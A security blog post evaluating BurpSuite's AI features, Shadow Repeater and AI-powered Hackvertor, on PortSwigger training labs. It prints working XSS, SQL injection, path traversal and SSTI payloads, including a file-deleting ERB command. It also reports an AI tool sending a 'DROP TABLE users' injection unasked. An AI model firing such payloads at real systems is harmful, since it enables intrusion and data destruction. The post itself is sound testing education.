Skip to main content

BurpSuite’s New AI Features: Are they as AI-mazing as they sound!?

Whilst it seems like everyone and their pets are currently integrating Artificial Intelligence (AI) into their workflows, the folks over at PortSwigger seem to have been cooking something up quietly. This isn’t surprising, the team there are fantastic and often only drop big news when there is substance behind it. Last week, I saw James Kettle (@albinowax) on LinkedIn discussing some new features coming to BurpSuite. In fact, PortSwigger had somewhat of an internal competition to pitch AI features to add to BurpSuite, that’s pretty cool, right? From Gareth Heyes (@garethheyes):

At PortSwigger we had an opportunity to pitch our ideas for an AI feature in a Dragons Den-style competition.

Anyway, it’s Monday and I’ve had some coffee, so I decided to dive head-first into these new features and see whether, as usual, they had reserved the hype for the right reasons. This blog post will dive into several new features, as well as draw your attention to some changes to documentation and best practices when using AI in BurpSuite. This isn’t intended to be a comprehensive guide, deep dive, or even research on the new features. Just a gentle introduction, some ideas, concepts, and hopefully some useful information.

Note that you will have to currently be using the “Early Adopter” download package from PortSwigger and have a BurpSuite Professional subscription. We will go over how to install the “Early Adopter” version in this post and also how to enable the AI features. If you are reading this and BurpAI is now in the production releases, you can ignore that content.

TLDR: Blog Overview

The blog content we will be covering today has been summarized below, without the use of AI:

  • New AI Feature List
  • Changes to Documentation/EULA
  • Early Adopters
  • Shadow Repeater
  • AI Powered Hackvertor
  • Conclusion

New Feature List

The first thing that caught my eye was the Shadow Repeater function. This was written by Gareth Heyes and is designed to help enhance the testing of parameters for common web vulnerabilities, such as XSS and path traversal. It does this by automatically (behind the scenes) sending requests that enhance the payloads used by the tester. It tries to understand context using changes to the request’s response and appears to be a great way to ensure you didn’t accidentally miss a vulnerability due to a missing quote, or the wrong encoding. We will dive into Shadow Repeater later in the blog, including setup, usage, and any observations we had when testing it.

Mr Heyes also released his Hackvertor with AI enhancements the week before. Hackvertor, for those unaware, is an extension that allows you to dynamically encode, decode, and transform HTTP traffic in Burp Suite. It utilizes a tag-based system which lets you specify how the content between the tags is interpreted. It’s nothing magic, but it enhances your workflow, and just generally makes life easier.

For example, in repeater, you might want to Base64 encode a specific part of your request. Just wrap your <@base64>text in here</@base64> and you’ll send dGV4dCBpbiBoZXJl instead. So, what’s the AI component? Well, now you can discuss the type of tag you want to add, and the AI will create it for you. The example given in the accompanying release video is to create a tag that reverses text. Then, you’d just stick your text in <@reverse>between these tags</@reverse>… and in your request that would be sent, quite incoherently, as “sgat eseht neewteb”!

Finally (up until the date I was writing), there is also now the ability to use the Montoya API with AI and LLMs to help build and extend extensions with the integrated PortSwigger AI. From reading this, it seems to abstract away the complexities of sending and receiving AI prompts in code and instead lets you focus on the core idea of your extension. I foresee this increasing the speed at which extensions can be output and also improving the quality and useability of those that are. From a security perspective, it will also be helpful if you no longer have to handle your own GPT/Grok/<insert AI here> keys.

Documentation, Documentation, Documentation

With the introduction of the new AI features, you can peep some new pages on the Burp Suite documentation pages as well as some changes to their EULA (highlighted on the releases page). I didn’t memorize the previous EULA and can’t tell you explicitly what changes relate to AI, but as with everything, I always advise erring on the edge of caution whenever sending data to any AI agent.

The primary additions to the documentation begin here. You can just read these, but I’ve summarized them below. In terms of best practices:

  1. All extensions must have explicitly declared AI support, and the user must have a version of Burp Suite that enables AI support. These ensure a checkbox can be ticked per extension that “allows” AI to be used.
  2. You should minimize the data sent to the LLMs. I don’t think this is a surprise if you’ve ever used GPT with an API key. The more you want to send and receive, the more you spend financially. Restricting what is sent to only what is necessary is a great way to reduce this spend and enhance processing times.
  3. Using effective prompts will ensure higher quality responses. This is a no-brainer and any casual AI user will no doubt have noticed it.
  4. Use lower temperatures for accuracy. You can consider this like “hot and cold” in some ways – You are giving the AI the permission to be more creative with a higher number. Thus, consider what you need it for. Do you WANT it to be creative and try to find solutions? Stick it higher, and match it with the context of the task.
  5. Error catching and optimization. Basically, AIs and LLMs can fail for a variety of reasons (and statistically are more likely to fail than pre-defined input | output systems), so ensure there’s suitable error handling set up to fail with grace.

For an overview of implementing the best practices and examples in code, check the link below:

https://portswigger.net/burp/documentation/desktop/extensions/creating/creating-ai-extensions/developing-ai-features

Finally, the docs also state that you get some AI credits to use with the new services. From PortSwigger’s documentation page:

All Burp users currently receive 10,000 free AI credits. You can buy extra AI credits from the PortSwigger site.

Hopefully, I can give you an idea by the end of this blog post how many were used in the creation of this blog post [Spoiler, check the end to see how many credits I used]. PortSwigger state that 10,000 credits are about $5 worth.

 

Early Adopter

If you are reading this shortly after the AI release, you may be wondering how to get onto the Early Adopter branch. Luckily, you don’t need any special membership, you just need to have the correct version installed.

Head over to the Burp Releases page and ensure you are clicking on the latest “Early Adopter” version.

https://portswigger.net/burp/releases#professional

Downloading Burp Suite Early Adopter

Run the installer. Once done, you can load up Burp Suite and head over to the user settings. Under the “Updates” section, be sure to change this to “Early Adopter”.

Setting the updates to use the "Early Adopter" channel

Burp Suite should then reboot into the “Early Adopter” mode. You can confirm this at the top of the Window.

The Burp UI Title Pane

Nothing much else needs to be done from there to get the Shadow Repeater and various other “Early Adopter” modules to be available. They should now show up in the BApp store, as seen below.

Shadow Repeater in the BApp store

When you go to your extensions page, you have to be sure to tick the “Use AI” checkbox. I like this sort of “guardrail” and think it would come in handy when you have an extension that has both AI and non-AI functionality, which we’ll probably see with the AI powered Hackvertor later on.

AI guardrails option accessible on the extensions page

Shadow Repeater

Let’s start with Shadow Repeater. The goal of this section is to try to understand the functionality and evaluate its use cases. I’ll be using PortSwigger’s own academy labs for this and testing various components and noting anything that might be useful.

By default, Shadow repeater gets invoked on the 5th repeater request you make, and it requires a parameter or header to be changed.

It was important for me to understand what Shadow Repeater is good at, and what it isn’t. It is my hope that the following sections highlight this, and allow you (as a pro web app hacker/bug bounty hunter) to understand its limitations and get the most out of it. More discussion on this in the Ramblings section.

Easiest XSS Challenge, I choose you!

I’ll load up the most basic XSS challenge from PortSwigger:

The description of the first XSS challenge in PortSwigger

After playing with the application for a little while, I can see that using the search box reflects my input in the response without sanitization.

Potential XSS injection in the search field

I sent a few modified requests to the repeater, each with a slight mistake on traditional XSS payloads, such as spelling “script” wrong or forgetting tags:

  • /?search=<s>test</s>
  • /?search=script>alert(1)</script>
  • /?search=<sript>alert(1)</script>
  • /?search=<script>aert(1)</script>
  • /?search=<sriptalert(1)</script>
  • /?search=<script>aert(1)</script>

Sure enough, on the fifth request, I had some action in my “Organizer” tab. I’ve tried to get all the information into the image. As you can see, it has flagged the baseline request/response, as well as a pretty incoherent note:

The Organizer tab in burp after an unusual response is detected

Evidently, it did successfully fix my script tags, but that payload didn’t pop an alert for me. Good first effort though? It flagged me to a response differentiation which I could then attack manually after realising my spelling mistakes.

You can see output relating to what the tool performed (though, it’s somewhat vague) in the Extension output tab:

The Shadow Repeater output tab

Using Logger++ (which everyone should be using), we can see all the requests that are made by extensions. This is really interesting from the AI perspective, as we can ascertain certain details around its thought process and how it determines what to flag.

Let’s break it down. As you can see, between my repeater requests, there were 6 extra requests sent with the “Tool” being “Extensions”. The first, ID 35, we can assume to be a baseline check. We saw that in the output in the “Organizer” tab. I have highlighted the requests made by the extension in red below. My requests are in green.

The Shadow Repeater requests that were made

I think this is really interesting from a “how does this thing work” perspective. The first baseline request has a response length of 3183. The four subsequent requests (ID 36-39) look like the AI trying to establish a baseline differentiator. It increments from a 4 character input, to a 6 character input, then an 8 character input. The response length goes up whenever it increments its input by 2, which is probably it trying to learn how the response changes based on different inputs. I would imagine other fields, such as timing differentiators, are also being factored into the analysis.

Finally, it sends the payload below:

  • /?search=<script>alert(‘test’)</script>

This is, funnily enough, extremely close to a correct payload. The only issue is the backslash that escapes the forward slash, thus, never closing the script tag. It also URL encodes it for us. So what triggered this as a reason to “flag”? The response actually doesn’t trigger an alert, and the resulting HTML actually appears to break the structure and remove the footer!

The output of the injection attempt

Going back to the “note” in the Organizer tab:

I think this is saying that in the initial request, there is one script tag. In the new request, there are two script tags. But that’s just an observation, maybe something to do with the way the line breaks after them? Overall, it did well to flag that there WAS an issue with my payloads (albeit, this was very simple).

A Wild “Error-based SQL Injection” Appeared

I’ll play about with a slightly harder lab and attack vector to see if we can get any closer to deducing it. The next one will be an error-based SQL injection lab. I expect (before playing with it) that this will be easy enough for it to flag.

SQL Injection lab definition from BurpSuite

I’ll start by just sending a few requests to repeater, then changing some header values, but without invoking any errors myself. As per my previous example, I am highlighted in the green (you can tell as the “Tool” is “Repeater”) and the AI is highlighted in red.

After 5 requests, the AI started to send requests

I denoted a few things from this part of the test. As you can see, the first three requests sent by me (153-154) are variations on the query parameters. Then I switched to playing with cookies, such as adding a new “admin=1” cookie, and changing the content of existing cookies. One of these, I knew from the description, would just require a singular apostrophe to trigger an SQL error.

My observations are below:

  • Despite the first three requests being for different query parameters, the AI requests purely focused on the FIFTH request and played with the cookie. It did not send derivations of the first 2 requests to different endpoints.
  • The AI again used a baseline request itself to orientate itself (I sent a request with “TrackingId=123!!” and the first AI request was the same).
  • The AI didn’t start to put any malicious characters in here, and instead, seemed to just mirror my style of [a-zA-Z0-9] input. This is because (as per Gareth Heyes) this works by creating variations of input, rather than trying to understand context.

A list of cookies sent by the AI has been provided below (note only the cookie changed per request):

  • Cookie: TrackingId=123!!; [Baseline]
  • Cookie: TrackingId=kL ;
  • Cookie: TrackingId=RJi8 ;
  • Cookie: TrackingId=GtiFw8;
  • Cookie: TrackingId=KrEwKQgt;
  • Cookie: TrackingId=ghjCC4WwVNh4zSxa;
  • Cookie: TrackingId=gahCC3XwVNh4zSxa;
  • Cookie: TrackingId=gahCC3WwVNh5zSxa;
  • Cookie: TrackingId=gahCC3WwVNh4zSym;
  • Cookie: TrackingId=gahCE4WwVNh4zSxa;
  • Cookie: TrackingId=567;
  • Cookie: TrackingId=456!!;
  • Cookie: TrackingId=123@!;
  • Cookie: TrackingId=321!!;
  • Cookie: TrackingId=143?!;

This is pretty interesting. It looks like it was going through a similar “orientation” phase before starting to send what it thought are variations of what I sent (changing orders, adding a few special characters). It did not manage to work out that I was trying to “exploit” something, though I think a lack of identifiable context in my input was to blame. This is the same as any AI, the clearer you make your goals, the better the output usually is.

Better black box -> Better magic -> Better output.

So, let’s try again, but this time, I’ve been accidentally trying to test for SQL injection using double quotes (“) rather than single quotes (‘). I sent the following cookie 5 times:

  • Cookie: TrackingId=123″+or+1=1–+-;

This resulted in the AI making the following requests itself:

  • Cookie: TrackingId=123″+or+1=1–+-;
  • Cookie: TrackingId=e8  ;
  • Cookie: TrackingId=QIfV  ;
  • Cookie: TrackingId=3Bt6QI;
  • Cookie: TrackingId=ldiZ3vzS;
  • Cookie: TrackingId=”123;+DROP+TABLE+users;–“;
  • Cookie: TrackingId=”123;SELECT+*+FROM+users;–“;
  • Cookie: TrackingId=”123’or’1’=’1″;
  • Cookie: TrackingId=”123′ UNION SELECT null, version()–“;

We can see the orientation requests (4 chars, 6 chars twice, 8 chars). Then some legitimate SQL attempts.

Finally, on the last request, it triggered a notification in my Organizer. The second last request was actually perfectly formed SQL as it closed out each of its single quotes (‘), so it didn’t register that it was actually injecting. But for the last attempt, it knew, as there was a drastic change in the output fields.

My Organizer tab

Again, the “notes” are not overly clear, but now it’s a little clearer than it was in the previous output. Evidently, it uses characteristics of previous responses (number of divs, new lines, errors, spaces, warnings) to evaluate a difference in the current responses and flag them. This is just what you’d do with your intruder output when fuzzing, but it makes the requests for you. However, let’s talk about the elephant in the room.

After I reviewed these requests, you can imagine my reaction to one of those inputs:

  • Cookie: TrackingId=”123;+DROP+TABLE+users;–“;

A meme with Dwayne "The Rock" Johnson

So whilst it correctly started to identify that I was looking for SQL injection issues in the cookie… It also sent something I’d never consider sending on an engagement. A drop table command!

Now before I get clobbered for being unrealistic, I know that the chance of this actually working (and dropping tables) is ridiculously low… But it’s higher than if I had just been testing manually. And we are in the business of reducing risk😊 To be successful, it would need to:

  • Be a perfectly formatted SQL injection payload
  • Contain a table called “Users”
  • Have permissions to delete said table

But still – I was hoping for some sort of guardrails here baked into the prompt it sends. Or maybe there is, and the AI just went rogue 😉 I think this just goes to show that we MUST tread carefully with these new technologies, and whilst if I had been missing a critical finding because I’d fat fingered the wrong symbol (” -> ‘), then I’d find this SQL injection… I also could’ve found something much worse (the wrath of my client).

My takeaways from this section:

  • The context in which you are sending the fifth request is what matters to Shadow Repeater. If you sent four targeting a query parameter and the fifth to a cookie, it would send its attempts to the cookie.
  • It bases attempts on your type of attack, so it works best when you’re explicitly testing for something that requires variations on payloads. An immediate example that springs to mind is Path Traversal.
  • This AI has no fear! Just kidding. Well, it doesn’t, but it won’t hesitate to send potentially state changing commands.

Go get ’em Burp AI: Double-Encoded Path Traversal

Ok, so we’ve started to look at some arbitrary examples where the solution was pretty simple, and we just didn’t quite have the right format in our request. Both times, Shadow Repeater just about managed to work it out for us. Let’s go for something more realistic that may be akin to actual testing. For this lab, we have a path traversal that requires a double URL encoding and blocks path traversal characters. My prediction (pre testing) is that this will be very good at this.

The Lab Description page

I’ll actually just try to perform this myself like I would in an assessment (though I’d probably be sticking stuff through intruder in reality):

  • /image?filename=64.jpg
  • /image?filename=/etc/passwd
  • /image?filename=../../../../../etc/passwd
  • /image?filename=/var/www/images/../../../../../etc/passwd
  • /image?filename=/var/www/images/….//….//….//….//….//etc/passwd

As always, here is the Logger++ output showing the result of the AI powered repeater after I send my initial 5 requests:

Logger++ output

As you can see… that got it nearly immediately. Pretty impressive actually. I can foresee this being especially useful for parser differentiation style attacks. For those interested, here were the requests that it made:

  • /image?filename=hR++
  • /image?filename=Yj3c++
  • /image?filename=QtezKK
  • /image?filename=jn6GBRVm
  • /image?filename=..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
  • /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

And here are the notes from the Organizer tab:

Burp Organizer view

Path Traversal vs BurpAI – Round 2

Since it did so well there, let’s pit it against another Path Traversal lab, only this time, one that requires a null byte bypass.

I first considered whether it would automatically be able to deduce whether a null byte could help perform a path traversal. So, I started by giving it very little data to work with, but a general idea of my attack path:

  • /image?filename=6.jpg
  • /image?filename=../../../../../etc/passwd
  • /image?filename=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
  • /image?filename=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
  • /image?filename=%252f%252e%252e%252f%252e%252e%252f%252e%252e/etc/passwd
  • /image?filename=/etc/passwd

This resulted in a fairly large number (comparative to previous that I’d observed) requests being sent by the AI:

  • /image?filename=/etc/passwd
  • /image?filename=gw++
  • /image?filename=YOit++
  • /image?filename=VxfEyl
  • /image?filename=x2LIDxsU
  • /image?filename=..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
  • /image?filename=..%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%2Fetc%25252fpasswd
  • /image?filename=..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%2Fetc%2Fpasswd
  • /image?filename=..%252E%252E%252F..%252E%252E%252F..%252E%252E%252F..%252E%252E%252Fetc%2F%252Fpasswd
  • /image?filename=%2F..%25c0%25ae%25c0%25ae%2F..%25c0%25ae%25c0%25ae%2F..%25c0%25ae%25c0%25ae%2F..%25c0%25ae%25c0%25ae%2Fetc%2Fpasswd
  • /image?filename=..%25ef%25bc%258e%25ef%25bc%258e%252f..%25ef%25bc%258e%25ef%25bc%258e%252f..%25ef%25bc%258e%25ef%25bc%258e%252fetc%252fpasswd
  • /image?filename=..%25c0%25ae..%25c0%25ae%252f..%25c0%25ae..%25c0%25ae%252f..%25c0%25ae%252e%252e%252fetc%252fpasswd
  • /image?filename=..%2525%2532%2565..%2525%2532%2565..%2525%2532%2565%2Fetc%252fpasswd
  • /image?filename=..%25ff%252e%25ff%252e%252f..%25ff%252e%25ff%252e%252f..%25ff%25E2%2580%25A2%25ff%25E2%2580%25A2%2Fetc%252Fpasswd

Whilst it didn’t get it with the above requests, it did send some pretty interesting encodings that I definitely would not have sent manually. I cobbled them together below:

So I thought I’d give it a little hint and send requests with the “.png” extension (remember, the solution is “../../../../../etc/passwd%00.png”). As always, you can tell my requests from the green border and the AI from the red border. After orientating itself, it again looked to focus on encoding rather than trying to manipulate the filename:

There was no dice on that input. I thought I’d give it a bit more of a chance, it was sunny and I was feeling generous! So I started sticking hints about null bytes and changes to the path itself:

Sadly, it still didn’t quite get there, and even started trying pretty arbitrary files at this point. Finally, I sent 5 requests with one that was actually valid. It still failed to identify it during the AI-powered requests.

Undeterred, I continued with my exploration of another lab experiment!

Don’t Slow Down, You’re Almost There!

Finally, I wanted to see if it detected time-based issues. The easiest way to do this was to load up a time-based SQL injection challenge and chuck payloads for everything but the correct Database Management System (DBMS) at it and see if Shadow Repeater tried any others for me. Here is the challenge (and solution):

The five requests that I sent, were a mix of MSSQL and MySQL time-based payloads:

  • Cookie: TrackingId=123’%2bWAITFOR DELAY ‘0:0:10’–+-;
  • Cookie: TrackingId=123’%20%2b%20WAITFOR DELAY ‘0:0:10’–+-;
  • Cookie: TrackingId=123’%20%2b%20sleep(10)–+-;
  • Cookie: TrackingId=123’%3bSELECT+sleep(10)–+-;
  • Cookie: TrackingId=123’%3bWAITFOR DELAY+’0:0:10′–+-;

The subsequent requests sent by the Burp AI Shadow Repeater:

  • Cookie: TrackingId=123’%3bSELECT+sleep(10)–+-;
  • Cookie: TrackingId=Tn ;
  • Cookie: TrackingId=8i17 ;
  • Cookie: TrackingId=p0wvmr;
  • Cookie: TrackingId=r76SbS3v;
  • Cookie: TrackingId=ZdWD2gWB3a1fB3lC;
  • Cookie: TrackingId=123’%2bWAITFOR DELAY ‘0:0:5’–+-;
  • Cookie: TrackingId=123’%20%2b%20WAITFOR DELAY ‘0:0:5’–+-;
  • Cookie: TrackingId=123’%20%2b%20sleep(5)–+-;
  • Cookie: TrackingId=123’%3bSELECT+sleep(5)–+-;
  • Cookie: TrackingId=123’%2bWAITFOR DELAY ‘0:0:15’–+-;
  • Cookie: TrackingId=123’%20%2b%20WAITFOR DELAY ‘0:0:15’–+-;
  • Cookie: TrackingId=123’%20%2b%20sleep(15)–+-;
  • Cookie: TrackingId=123’%3bSELECT+sleep(15)–+-;
  • Cookie: TrackingId=123’%2b’%2b’A’;

There is nothing too interesting there. As you can see, it stuck to what it knew we were looking for (MSSQL and MySQL) and most importantly didn’t try to drop anything (woo). I started to warm it up a little by switching to some PostgreSQL payloads to see if it had any more luck.

  • Cookie: TrackingId=123’+and+pg_sleep(10)–;
  • Cookie: TrackingId=123’+||sleep(10)–;
  • Cookie: TrackingId=123’||sleep(10)–;
  • Cookie: TrackingId=123’|pg_sleep(10)–;
  • Cookie: TrackingId=123||pg_sleep(10);

This resulted in the following AI requests. I have highlighted the winner winner, chicken dinner request that we were looking for!

  • Cookie: TrackingId=123’|pg_sleep(10)–;
  • Cookie: TrackingId=70 ;
  • Cookie: TrackingId=bb1W ;
  • Cookie: TrackingId=bo7CJv;
  • Cookie: TrackingId=pJX6beh2;
  • Cookie: TrackingId=123’%3bWAITFOR DELAY+’0:0:05′–+-;
  • Cookie: TrackingId=123’+and+pg_sleep(5)–;
  • Cookie: TrackingId=123’+||sleep(5)–;
  • Cookie: TrackingId=123’||pg_sleep(5)–;
  • Cookie: TrackingId=123’%26%26pg_sleep(10)–;
  • Cookie: TrackingId=123’%3Bpg_sleep(15)–;
  • Cookie: TrackingId=123’%2BOR+pg_sleep(7)–;
  • Cookie: TrackingId=123’+WAITFOR DELAY+’0:0:10′–+-;
  • Cookie: TrackingId=123’%3bpg_sleep(20)–;
  • Cookie: TrackingId=123’+and+sleep(7)–;

Wow, thanks Shadow Repeater… Or is it?

Looking back at my Logger++ and Organizer tab (where any findings are sent for review), it looks as though despite having the correct payload, it didn’t identify anything unusual about the response:

Though in my Logger++ output, it definitely did manage to exploit it:

So, from this, we can also conclude that it may not be the best (if at all) at identifying payloads that cause time-based differentiations in your response. Just something to bear in mind when you are putting those Blind SQLi payloads in your repeater and assuming that it would be reported if there was a sleep. As always, the takeaway here is that these tools are for enhancing our workflow, but we should always be double-checking outputs in Logger++ to see any issues that either an extension or Burp Suite itself did not flag.

Ramblings

For me, these initial tests painted a pretty clear picture of the nature of this extension. I think it will be EXTREMELY helpful for very niche issues – Such as finding a specific encoding that hasn’t been considered or is parsed differently between a frontend and backend proxy. There is such potential in the way it creates so many similar payloads and automatically tries to derive differences in responses.

On the flip side, it’s probably going to miss a LOT too, just by its nature. If it’s only sending 10 extension requests (configurable, but you’d want to limit it reasonably well as it costs credits) and some of these are using unprintable characters, then it’s obviously missing some of the basic requests too. Here we looked at it through the eyes of “Can you spot the issue” rather than “Can you complement my testing”, which I think is a better way to view this companion extension. This is echoed by Gareth Heyes in the following statement on the release page, which caught my eye:

My second breakthrough was instead of telling the AI to understand what is being tested, I simply told it to find variations of it. This meant giving the AI general instructions to find variations but not going to detail about what it’s actually testing. This works surprisingly well: it’s aware of the context thanks to the Request Differ and knows the data you’re testing. It generated variations for Path Traversal, XSS, and other types of vulnerabilities.

I think that removing the concept of “understanding” what is being tested removes a fair bit of the context that AI systems NEED to proficiently and accurately do their job. However, by just asking for variations of specific insertion points, we’re also more likely to find things we’d have missed before. It became clear whilst using Shadow Repeater that it was not about sporadically finding vulnerabilities (we have Active Scan for that), but it was about enhancing payload generation and potentially identifying previously unknown ways of attacking things.

AI-Powered Hackvertor

I’m going to cover this, though not in as much detail as the previous section, as I don’t think it’s quite as complex of a beast. I introduced Hackvertor earlier and I actively encourage any aspiring web application tester to use it, it improves your workflow, helps you identify vulnerabilities based on different encodings, and generally is less work than trying to remember all the hotkeys and shortcuts that Burp Suite has already. Furthermore, you have access to a larger array of encoding/parsing/encrypting methods, which may come in handy at the times you least expect!

I would recommend you watch this video if you want an overview of the sorts of things that were advertised when Hackvertor was released (it’s great!):

https://www.youtube.com/watch?v=Flg0wOmgbDo

Configuring Hackvertor with AI

As before, you need to ensure you enable the “Use AI” field on the extensions page. You’ll also need to go to the “Hackvertor” tab at the top, then “Settings”, and enable all the AI features. You should end up with a window that somewhat resembles this:

Creating Your First AI Tag

Right, let’s create our first AI-powered, magical tag. Head to the “Hackvertor” tab and then go on “Create Custom Tag”. If you have the correct settings for AI configured (as previously discussed) then you can select the language as “AI”. In Gareth’s introductory video, he created a tag to crack MD5 hashes. Pretty neat! But we’re going to try something a little different, otherwise, why are you here, you may as well just watch his video?! I had some ideas whilst first reading about these new features, so here are the results and their efficacy.

Shorter XSS Payloads

The first thing I considered was ways to shorten XSS payloads for report proof-of-concepts. Sometimes, you are injecting into a field with limited characters, and every character counts. It would be cool to be able to stick my payload in a tag and see if it gets shortened enough to fit when it gets sent to the server. Here are the options I fed the AI:

Note that I altered the temperature default to 1.25 which should add a little more fruitiness to the results. Going to the “Custom” tags section in Hackvertor, I can see whether this works…

OK, nice, it worked to shorten it and successfully found a smaller payload. Success! Next, I considered adding a parameter to it, so that we can add further context to the payload shortener. Let’s say I want to do the same again but know “script” tags are blocked by a WAF. I’ll add a context parameter where we can add some new information to the tag and make the tag more detailed. I’ll also adjust the initial code so that it is an XSS assistant rather than just a shortener. I personally think the more niche of a task you can give it, the better, but we’ll see how this goes. The image below shows the prompt now:

The photo below shows the result (first time):

The following table shows how adjusting the temperature affected the output. The context given to the AI was “‘I need to shorten this payload and avoid the use of script tags”.

Temperature Input Output
1.0 <script>alert(1)</script> <svg/onload=alert(1)>
0.2 <script>alert(1)</script> <svg onload=alert(1)>
2.0 <script>alert(1)</script> “)};alert&lpar;1&rpar;//

The latter is pretty invalid. Funnily enough, it only seemed to give me that payload on the maximum temperature. Even at 1.95, it produced a valid payload.

I tried to get it to do some WAF bypass stuff and it didn’t fare too well on the higher temperature. Adding an explicit note in the prompt to ONLY return the XSS payload would maybe have solved this, but I can’t explain what happened below:

My Own Content Converter

One of my favourite extensions is the “Content Type Converter”. It’s great for checking whether a web application accepts both JSON and XML for requests, and can be really useful at finding weird vulnerabilities in when it attempts to parse unknown data inputs. I won’t stop using it as a result of the tag I’m about to show, but I think it’s a really nice way to show the potential of this tool and how quickly something can be *mostly* achieved with Hackvertor AI. I’ve given it the following prompt:

Let’s try it out! As you can see below, the conversion from JSON to XML was not bad at all.

We can also try to convert it to “application/x-www-form-urlencoded” and see if it understands it, just by adding it into the format parameter:

How about YAML?

Finally, it got SOAP pretty close too.

Again, I think in each stage, it got the general gist of what we wanted. I think this is extremely impressive to have spun up in less than 10 minutes and could definitely be something incorporated into a scripted workflow, or as part of another extension.

SSTI Format Modification

Finally, before we jump into some of the other features, I often find myself going down the HackTricks list of payloads trying to find a valid SSTI test payload when I believe I have control over a template injection issue. How about if Hackvertor AI could just generate it for me, if I know the backend?

Rather than bombard you with more images, here is a summary of the results:

Tag format:

<@_ssti_format(‘1.0′,'<engine>’,’55d678b92ea4742f25c51f8c54593360′)>7*7</@_ssti_format>

Engine (Argument) Result Validity
razor @{7*7} Correct
pugjs #{7*7} Correct
NUNJUCKS {{ 7 * 7 }} Correct
erb (ruby) <%= 7*7 %> Correct
tornado {{ 7*7 }} Correct
mojolicious <%= 7*7 %> Correct
twig {{7*7}} Correct
freemarker (java) ${7*7} Correct
jinja2 {{ 7*7 }} Incorrect (causes an error)
asp {{ 7*7 }} Incorrect

Finally, just for a bit of fun, I wanted to see if I could create a tag to find the SSTI payload to the first PortSwigger SSTI lab. The prompt I gave my tags can be seen below:

The challenge requires us to delete a file – “/home/carlos/morale.txt” – using a Ruby (ERB) SSTI. The correct payload will be:

  • <%= system(“rm /home/carlos/morale.txt”) %>

The following input was provided:

Help me delete the file at /home/carlos/morale.txt. The templating engine in use is Ruby ERB.

The output can be seen in the image below, whereby it prompts us to use the “File.delete” function.

Let’s see it working in Repeater. I entered my message in the request:

Then I highlighted it and right clicked before going to the Hackvertor option and converting it with my new “ssti_pwn” tag.

Then finally, I right clicked on the request, went to the Hackvertor option, and clicked on “Convert Tags” to get the payload converted. This resulted in the same payload as before:

I URL encoded it (but we could also get the prompt to do that) and sent it. The lab just returned a “1”…

But when I sent it again, it looked solved 😊

And there we have it – Creating an AI tag with Hackvertor to perform an SSTI attack for us based on our natural language input. You can’t tell me you don’t find that cool – This tech is mind boggling sometimes!

Auto Tag Generators

Another component that caught my eye from the release video was the auto generation of tags based on input from Repeater. This has to be innately enabled (we ticked it when we were in the Hackvertor settings).

I’ll preface this by saying I don’t feel comfortable sending a whole repeater request to AI systems, as this often contains some form of credential material. The other features we’ve examined so far only send portions of the prompt to BurpAI, which I’m relatively comfortable with and confident of its usage (from a privacy, anonymity, and security perspective).

But alas, let’s have a quick look at what it might do for you if you have this enabled. I sent the following GET request about 5 times to repeater:

In the extensions tab, I noticed some output from the Hackvertor tool. Here is an extract:

I sincerely apologize for that ugly block of text, but think it’s a pretty interesting insight. We can see that it sent the whole request over (including cookies ☹) to the AI service and it correctly identified that there was a URL encoded parameter in the GET request. It then automatically ended the prompt with a JSON object with instructions. Following that, there were “CodeConversions” run:

The resulting Hackvertor tags are then available in my UI, without me every creating them:

Whilst this is undoubtedly a very intelligent feature, I’m struggling to see the use-cases where background automation here is beneficial. I guess if there were fields in the request that you assumed were not decodable (NEVER ASSUME!!!) then perhaps this would be useful. Or maybe it would just be quicker than sorting it manually. Either way, I think a better approach would be to just be able to send a part of a request from repeater to have a decoder tag created for it. For example, in the same way you can highlight part of a request and send it for Active Scanning, you could do the same here. Highlight the encoded part of a request and have a “Create AI Decoding Tags” for it. For me, that would have more applicability, but your mileage may vary, and maybe I’ve not considered a use case!

Use AI to Generate Code

Finally, you can now use the same custom tag AI components to create code for performing actions on tags explicitly. For example, let’s say I wanted a tag that, when wrapped around a number, would give me the square of that number, multiplied by 1337. In the “Create custom tag” UI, I’d select a name for my tag, then also select a language. I chose JavaScript in this example.

Then we just click on the “Use AI to Generate Code” button, enter a test input and an expected output, and finally end up with something resembling this:

I’ll save that tag, and now whenever I want to perform my 1337 math operation on an integer, I’ll just wrap those tags around it. I don’t think that’s overly useful, but the concept is there, and you can expand on it how you wish.

Ramblings v2

Overall, I can definitely see the applicability of the prompted AI tag generation and believe that it will be the most useful for me and my workflow. Furthermore, when there are complex mathematical encoding/decoding or encryption/decryption’s that I need to make tags for, the new AI code generator will definitely come in handle. The fact we can now start to generate these from from scratch, directly in Burp’s UI, is such a game changer. Over time, as we (as security professionals) continue to learn and improve this technology and incorporate it into our workflows, I believe the cumulative gains will start to be exponential in terms of both testing quality, and also efficiency.

Concluding Thoughts

Well, there we have it. Today, we introduced two new AI features of PortSwigger’s Burp Suite in the “Early Adopter” build. We played with Shadow Repeater with some known exploitable labs and tried to identify how it might work best. We then had a look at the new AI -powered Hackvertor, which we used to create some cool conversions and solve some basic CTF challenges. Whilst these were very quick, high-level examinations, we were still able to draw some interesting conclusions and hopefully it gave you some ideas for how you can incorporate these into your workflow.

As with most new technologies, there are naturally some great points and some not-so-great points. My biggest concern around AI has been (and always will be) the unpredictability of it. Seeing a DROP TABLE command send by Shadow Repeater was a little terrifying, but that also encouraged me to review the prompt that was currently in place from the fantastic folks over at PortSwigger:

https://github.com/PortSwigger/shadow-repeater/blob/325e438bfadd0ac5bb8e9f280d521f481ffd81d2/src/main/java/burp/shadow/repeater/ai/VariationAnalyser.java#L36

As you can see, there are not any guardrails in place for “do not send anything that could change the state of a backend component, such as a modifying SQL statement”. Making your own adjustments based on what you are testing would be a welcome addition. Better yet, perhaps I’ll try to identify how to create a UI that lets me add and remove components from the prompt on the fly. This may enhance testing, if we can add a “focus on identifying unusual encodings and differentiations in parser responses” line for a specific endpoint, without having to recompile the extension. I’m not sure what that looks like in reality, but it’s on my TO-DO list for now.

